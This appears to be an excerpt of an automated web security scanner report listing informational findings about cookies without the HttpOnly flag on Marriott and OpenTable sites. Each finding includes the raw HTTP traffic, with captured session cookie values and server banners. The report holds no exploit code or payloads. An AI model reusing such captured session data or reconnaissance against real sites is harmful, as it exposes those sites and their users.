<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
12.57. http://www.marriott.com/search/findHotels.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /search/findHotels.mi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/findHotels.mi HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; mbox=check#true#1317646594|session#1317646533235-184575#1317648394|PC#1317646533235-184575.19#1318856136; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":1,"to":3,"c":"http://www.marriott.com/default.mi","lc":{"d4":{"v":1,"s":true}},"cd":4,"sd":4}; s_pers=%20s_lv%3D1317646553781%7C1412254553781%3B%20s_lv_s%3DFirst%2520Visit%7C1317648353781%3B; HDFind=true; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 12:56:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 324156


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
12.58. http://www.marriott.com/search/submitSearch.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /search/submitSearch.mi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/submitSearch.mi?searchType=InCity&groupCode=&searchRadius=50&recordsPerPage=10&vsMarriottBrands=&destinationAddress.city=bos&destinationAddress.stateProvince=&destinationAddress.country=&fromDate=&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&weekDays=S%2CM%2CT%2CW%2CT%2CF%2CS&dateFormatPattern=M%2Fd%2Fyy&toDate=&populateTodateFromFromDate=true&defaultToDateDays=1&roomCount=1&guestCount=1&marriottRewardsNumber=&clusterCode=none&corporateCode=&displayableIncentiveType_Number=&marriottBrands=all HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; JVMID=pEbizMdcomD167_prd1; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; mbox=check#true#1317646594|session#1317646533235-184575#1317648394|PC#1317646533235-184575.19#1318856136; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; MI_SITE=prod3; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":1,"to":3,"c":"http://www.marriott.com/default.mi","lc":{"d4":{"v":1,"s":true}},"cd":4,"sd":4}; s_pers=%20s_lv%3D1317646553781%7C1412254553781%3B%20s_lv_s%3DFirst%2520Visit%7C1317648353781%3B; HDFind=true

Response

HTTP/1.1 302 Moved Temporarily
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Location: http://www.marriott.com/search/findHotels.mi
Content-Length: 0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 12:56:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/

12.59. https://www.marriott.com/!crd_prm!.!cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /!crd_prm!.!cm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /!crd_prm!.!cm?crd_ver=0.9.5&crd_rnd=508779&crd_cnt=0.01&crd_tpb=1317646588001&crd_olt=7782 HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; s_pers=%20s_lv%3D1317646590532%7C1412254590532%3B%20s_lv_s%3DFirst%2520Visit%7C1317648390532%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":2,"to":5,"c":"http://www.marriott.com/search/findHotels.mi","lc":{"d4":{"v":2,"s":true,"e":1}},"cd":4,"sd":4,"f":1317646586583}; fsr.a=1317646594850

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Wed, 20 Apr 2011 13:16:59 GMT
ETag: "c001-327-708888c0"
Accept-Ranges: bytes
Content-Length: 807
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/plain
Date: Mon, 03 Oct 2011 12:56:23 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: MI_SITE=prod3;path=/

GIF89a....................................................................................................................................3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f....
...[SNIP]...
12.60. https://www.marriott.com/default.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /default.mi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.mi HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/expiredSession.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":4,"to":5,"c":"https://www.marriott.com/reservation/expiredSession.mi","lc":{"d4":{"v":4,"s":true,"e":3}},"cd":4,"sd":4,"f":1317646766835}; s_pers=%20s_lv%3D1317646786238%7C1412254786238%3B%20s_lv_s%3DFirst%2520Visit%7C1317648586238%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dmarriottglobal%253D%252526pid%25253Dwww.marriott.com/reservation/expiredSession.mi%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.marriott.com/reservation/cleanSession.mi%2525253Furl%2525253D/%25252526marshaTimeOut%2525253Dfalse%252526ot%25253DA%3B; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 12:59:27 GMT
Content-Length: 99910
Connection: keep-alive


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
12.61. https://www.marriott.com/reservation/availability.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/availability.mi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reservation/availability.mi?isSearch=true&propertyCode=BOSLA HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.marriott.com/search/findHotels.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; JVMID=pEbizMdcomD167_prd1; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; ctcData=searchCount_0*resAmount_0*inByTomorrow_false*city_BOS*state_MA*country_US*; MI_SITE=prod3; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":2,"to":5,"c":"http://www.marriott.com/search/findHotels.mi","lc":{"d4":{"v":2,"s":true,"e":1}},"cd":4,"sd":4,"f":1317646556133}; IS3_History=1317397011-1-67_16-1-__16_; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; s_pers=%20s_lv%3D1317646581955%7C1412254581955%3B%20s_lv_s%3DFirst%2520Visit%7C1317648381955%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dmarriottglobal%253D%252526pid%25253Dwww.marriott.com/search/findHotels.mi%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.marriott.com/reservation/availability.mi%2525253FisSearch%2525253Dtrue%25252526propertyCode%2525253DBOSLA%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Pragma: no-cache
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Mon, 03 Oct 2011 12:56:19 GMT
Content-Length: 101861
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...
12.62. https://www.marriott.com/reservation/availabilitySearch.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/availabilitySearch.mi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /reservation/availabilitySearch.mi?isSearch=false HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
Content-Length: 566
Cache-Control: max-age=0
Origin: https://www.marriott.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; JVMID=pEbizMdcomD167_prd1; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":3,"to":5,"c":"https://www.marriott.com/reservation/availability.mi","lc":{"d4":{"v":3,"s":true,"e":2}},"cd":4,"sd":4,"f":1317646586583}; MI_SITE=prod3; s_pers=%20s_lv%3D1317646762445%7C1412254762445%3B%20s_lv_s%3DFirst%2520Visit%7C1317648562445%3B

accountId=&fromDate=10%2F3%2F11&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&wee
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.marriott.com/reservation/expiredSession.mi
Content-Length: 0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 12:59:01 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/

12.63. https://www.marriott.com/reservation/cleanSession.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/cleanSession.mi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reservation/cleanSession.mi?url=/&marshaTimeOut=false HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/expiredSession.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; JVMID=pEbizMdcomD167_prd1; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":4,"to":5,"c":"https://www.marriott.com/reservation/expiredSession.mi","lc":{"d4":{"v":4,"s":true,"e":3}},"cd":4,"sd":4,"f":1317646766835}; MI_SITE=prod3; s_pers=%20s_lv%3D1317646786238%7C1412254786238%3B%20s_lv_s%3DFirst%2520Visit%7C1317648586238%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dmarriottglobal%253D%252526pid%25253Dwww.marriott.com/reservation/expiredSession.mi%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.marriott.com/reservation/cleanSession.mi%2525253Furl%2525253D/%25252526marshaTimeOut%2525253Dfalse%252526ot%25253DA%3B

Response

HTTP/1.1 302 Moved Temporarily
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.marriott.com/
Content-Length: 0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 12:59:25 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/

12.64. https://www.marriott.com/reservation/expiredSession.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/expiredSession.mi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reservation/expiredSession.mi HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":3,"to":5,"c":"https://www.marriott.com/reservation/availability.mi","lc":{"d4":{"v":3,"s":true,"e":2}},"cd":4,"sd":4,"f":1317646586583}; s_pers=%20s_lv%3D1317646762445%7C1412254762445%3B%20s_lv_s%3DFirst%2520Visit%7C1317648562445%3B; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Pragma: no-cache
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Mon, 03 Oct 2011 12:59:04 GMT
Content-Length: 25752
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...
12.65. https://www.marriott.com/reservation/rateListMenu.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/rateListMenu.mi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reservation/rateListMenu.mi HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":3,"to":5,"c":"https://www.marriott.com/reservation/availability.mi","lc":{"d4":{"v":3,"s":true,"e":2}},"cd":4,"sd":4,"f":1317646586583}; s_pers=%20s_lv%3D1317646762445%7C1412254762445%3B%20s_lv_s%3DFirst%2520Visit%7C1317648562445%3B; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3

Response

HTTP/1.1 302 Moved Temporarily
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.marriott.com/reservation/expiredSession.mi
Content-Length: 0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 12:59:01 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/

12.66. http://www.marriottvacationclub.com/index.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriottvacationclub.com
Path:   /index.shtml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.shtml HTTP/1.1
Host: www.marriottvacationclub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 13:02:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 40739
Content-Type: text/html
Connection: close
Via: 1.1 mcoatprdslb2 (Juniper Networks Application Acceleration Platform - DX 5.3.2 0)
Set-Cookie: rl-sticky-key=0ace8fd9; path=/; expires=Mon, 03 Oct 2011 13:07:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv
...[SNIP]...
12.67. http://www.opentable.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
